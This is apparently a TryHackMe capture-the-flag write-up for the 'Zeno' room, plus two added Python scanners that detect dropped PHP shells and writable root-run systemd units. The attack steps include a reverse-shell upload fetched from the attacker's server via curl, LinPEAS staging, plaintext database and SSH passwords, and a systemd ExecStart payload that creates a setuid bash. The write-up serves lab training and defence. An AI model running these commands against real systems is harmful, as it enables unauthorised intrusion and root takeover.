Room Link: https://tryhackme.com/room/zeno
Scans
Initial scan
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/12340 - HTTP
Kali
gobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Restaurant Management System Exploit
Exploit: https://www.exploit-db.com/raw/47520
The code needed some fixing up
From
To
Kali
python exploit.py http://$VICTIM:12340/rms/
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
python2 -m SimpleHTTPServer 81
Browser
http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.php
Kali
Browser
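The foothold above depends on a PHP file being written into /rms/images/, a directory that should only ever serve static content. The scanner below is an added example for this writeup, not code from the room, the RMS application or php-reverse-shell; it walks a web root and flags script files or PHP source inside image/upload directories, plus PHP that wires a request parameter into an exec-style call or pairs an outbound socket with a spawned process. The sample web root is constructed in a temporary directory so it runs offline, and the directory names and indicator lists are assumptions about a typical PHP application.

```python
"""Hunt for script files dropped into web-accessible image/upload directories.

Added example for this writeup, not part of the room, the RMS application or
php-reverse-shell.  The sample web root is constructed in a temp directory so
the scan runs offline; directory names and indicator lists are assumptions."""
import os
import re
import tempfile

SCRIPT_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")
STATIC_ONLY_DIRS = {"images", "img", "uploads", "assets"}   # should hold static files only
# Calls a gallery or upload handler has no reason to make.
DANGEROUS_CALLS = re.compile(
    rb"\b(fsockopen|proc_open|shell_exec|passthru|popen|exec|system|eval)\s*\(", re.I)
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b")


def classify_file(root, path):
    """Return indicator codes for one file; an empty list means nothing suspicious."""
    rel = os.path.relpath(path, root)
    in_static_dir = any(part in STATIC_ONLY_DIRS for part in rel.split(os.sep)[:-1])
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)             # shells are small; the first 64 KiB suffices
    is_php = b"<?php" in head or b"<?=" in head
    codes = []
    if in_static_dir and rel.lower().endswith(SCRIPT_EXTENSIONS):
        codes.append("SCRIPT_IN_STATIC_DIR")    # e.g. images/reverse-shell.php
    if in_static_dir and is_php:
        codes.append("PHP_CODE_IN_STATIC_DIR")  # also catches PHP hiding behind a .png name
    if is_php:
        calls = {m.group(1).lower() for m in DANGEROUS_CALLS.finditer(head)}
        if calls and REQUEST_INPUT.search(head):
            codes.append("REQUEST_DRIVEN_EXEC")  # request parameter reaches an exec-style call
        elif {b"fsockopen", b"proc_open"} <= calls:
            codes.append("SOCKET_PLUS_PROCESS")  # outbound socket plus spawned process
    return codes


def scan_webroot(root):
    """Walk the web root; return {relative/path: [codes]} for flagged files only."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            codes = classify_file(root, path)
            if codes:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = codes
    return findings


def build_sample_webroot():
    """Constructed web root: a real PNG header, a clean page, and two planted files."""
    root = tempfile.mkdtemp(prefix="webroot-")
    images = os.path.join(root, "rms", "images")
    os.makedirs(images)
    samples = {
        os.path.join(images, "logo.png"): b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        os.path.join(root, "rms", "index.php"):
            b"<?php\n// constructed: legitimate page\necho 'menu';\n",
        # Constructed stand-ins with the *shape* of planted code; neither is a working shell.
        os.path.join(images, "reverse-shell.php"):
            b"<?php\n$s = fsockopen('HOST', 0);\n$p = proc_open('CMD', array(), $pipes);\n",
        os.path.join(images, "avatar.png"):
            b"<?php\n$c = $_REQUEST['cmd'];\nsystem(CMD);\n",
    }
    for path, content in samples.items():
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, codes in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{rel}: {', '.join(codes)}")
```

Run it against a real document root by calling scan_webroot("/var/www/html") (path assumed); the content checks matter more than the extension check, because an upload handler that only blocks ".php" names will still happily store PHP source under an image name. The lasting fix is to disable script execution for those directories in the web server configuration so that a dropped file cannot run at all.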
Upgrade the shell (get autocomplete)
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
MySQL
Victim
mysql -u root -pveerUffIrangUfcubyig
Victim(mysql)
show databases;
use dbrms;
show tables;
select * from members;
Edward's password was still not found.
I went back to linpeas and found another password; it's for a different user, but it still worked.
TCP/22 - SSH
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
Victim(apache)
find /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null
Victim(apache)
vi /etc/systemd/system/zeno-monitoring.service
From
To
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'
[Install]
WantedBy=multi-user.target
Victim(edward)
sudo /usr/sbin/reboot
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
ls -lah
./bash_root -p
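The chain above works because a unit that systemd runs as root lives in a file a non-root group can write, so the unit's own ExecStart becomes the payload and the reboot executes it. The audit below is an added example for this writeup, not part of the room or of any tool it uses. It parses unit files, flags ones that are writable by or owned by non-root users, flags Exec lines that copy a shell binary or grant setuid bits, and reports the combination (root-run plus modifiable) that makes the escalation possible. The sample unit metadata is constructed inline so it runs offline; the "apache" group ownership is an assumption about how the room's unit file became writable.

```python
"""Audit systemd unit files for a root-run unit that non-root users can edit.
Added example for this writeup, not part of the room or of any tool it uses.
Sample units and their mode/owner/group are constructed; 'apache' group
ownership is an assumption about how the room's unit file became writable."""
import os
import re
import stat

SAMPLE_UNITS = {
    "/etc/systemd/system/zeno-monitoring.service": {
        "mode": 0o664, "owner": "root", "group": "apache",   # constructed metadata
        "text": (
            "[Unit]\nDescription=Zeno monitoring\n[Service]\nType=simple\nUser=root\n"
            "ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; "
            "chmod +xs /home/edward/bash_root'\n[Install]\nWantedBy=multi-user.target\n"
        ),
    },
    "/etc/systemd/system/good.service": {
        "mode": 0o644, "owner": "root", "group": "root",
        "text": (
            "[Unit]\nDescription=Well-behaved service\n[Service]\nType=simple\n"
            "User=nobody\nExecStart=/usr/local/bin/monitor --interval 60\n"
            "[Install]\nWantedBy=multi-user.target\n"
        ),
    },
}

# Exec= content that no monitoring service should need.
SUSPICIOUS_EXEC = (
    re.compile(r"\bchmod\s+\S*[+=]\S*s\b"),  # grants setuid/setgid bits
    re.compile(r"\bcp\s+/bin/(ba)?sh\b"),    # copies a shell binary elsewhere
    re.compile(r"\b(ba)?sh\s+-c\b"),          # inline shell script instead of a fixed binary
)
EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost", "ExecReload", "ExecStop")


def parse_unit(text):
    """Minimal INI parser: {section: {key: [values]}}; repeated keys are kept in order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def audit_unit(path, mode, owner, group, text):
    """Return [(code, detail)] findings for one unit file."""
    findings = []
    if owner != "root":
        findings.append(("NOT_ROOT_OWNED", f"{path} owned by {owner}"))
    if mode & stat.S_IWOTH:
        findings.append(("WORLD_WRITABLE", f"{path} mode {oct(mode)}"))
    elif mode & stat.S_IWGRP and group != "root":
        findings.append(("GROUP_WRITABLE", f"{path} mode {oct(mode)}, group {group}"))
    service = parse_unit(text).get("Service", {})
    runs_as_root = service.get("User", ["root"])[0] == "root"   # no User= means root
    for key in EXEC_KEYS:
        for cmd in service.get(key, []):
            hit = next((p.pattern for p in SUSPICIOUS_EXEC if p.search(cmd)), None)
            if hit:
                findings.append(("SUSPICIOUS_EXEC", f"{path} {key}={cmd!r} matches /{hit}/"))
    # The escalation condition itself: root runs whatever a non-root user writes here.
    if runs_as_root and any(c in ("NOT_ROOT_OWNED", "WORLD_WRITABLE", "GROUP_WRITABLE")
                            for c, _ in findings):
        findings.append(("ROOT_UNIT_MODIFIABLE", f"{path} runs as root but non-root users can edit it"))
    return findings


def audit_all(units=SAMPLE_UNITS):
    """Audit the constructed sample set (or any dict in the same shape)."""
    return {path: audit_unit(path, **meta) for path, meta in units.items()}


def audit_live(directory="/etc/systemd/system"):
    """Same checks against a real unit directory; needs read access to the files."""
    import grp, pwd
    results = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):          # skips .wants/ and other directories
            continue
        st = os.stat(path)                    # follows symlinks to the real unit file
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        findings = audit_unit(path, stat.S_IMODE(st.st_mode), pwd.getpwuid(st.st_uid).pw_name,
                              grp.getgrgid(st.st_gid).gr_name, text)
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for path, findings in audit_all().items():
        for code, detail in findings:
            print(f"{code:22} {detail}")
```

The same permission check is what the writeup's find over /etc was doing by hand; the audit adds the context that turns a writable file into a finding worth acting on (which user the unit runs as, and what its Exec lines do). After the fact, a setuid copy of bash in a home directory is the artifact to look for, and restoring the unit file to mode 0644 with root:root ownership closes the hole.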